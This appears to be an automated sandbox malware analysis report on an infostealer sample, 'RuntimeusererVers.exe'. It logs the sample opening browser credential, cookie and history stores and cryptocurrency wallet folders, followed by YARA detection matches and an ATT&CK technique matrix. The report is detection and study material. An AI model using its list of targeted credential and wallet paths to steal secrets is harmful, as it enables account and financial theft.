                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareportingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-walJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backupsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\gleanJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\bookmarkbackupsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-releaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\temporaryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanentJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\to-be-removedJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\eventsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                      Source: Yara matchFile source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1539604466.000001E3007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: 00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000003.1583982311.000002255B36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000000.1607926852.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003A.00000002.1634691522.00007FF6FEF29000.00000002.00000001.01000000.00000052.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1524655488.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 7988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 2956, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      331
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      2
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      11
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts22
                      Command and Scripting Interpreter
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      11
                      Deobfuscate/Decode Files or Information
                      1
                      GUI Input Capture
                      2
                      System Network Connections Discovery
                      Remote Desktop Protocol4
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Service Execution
                      1
                      Windows Service
                      1
                      Windows Service
                      2
                      Obfuscated Files or Information
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      GUI Input Capture
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      1
                      DLL Side-Loading
                      NTDS38
                      System Information Discovery
                      Distributed Component Object Model1
                      Clipboard Data
                      5
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Registry Run Keys / Startup Folder
                      1
                      Valid Accounts
                      LSA Secrets431
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials2
                      Process Discovery
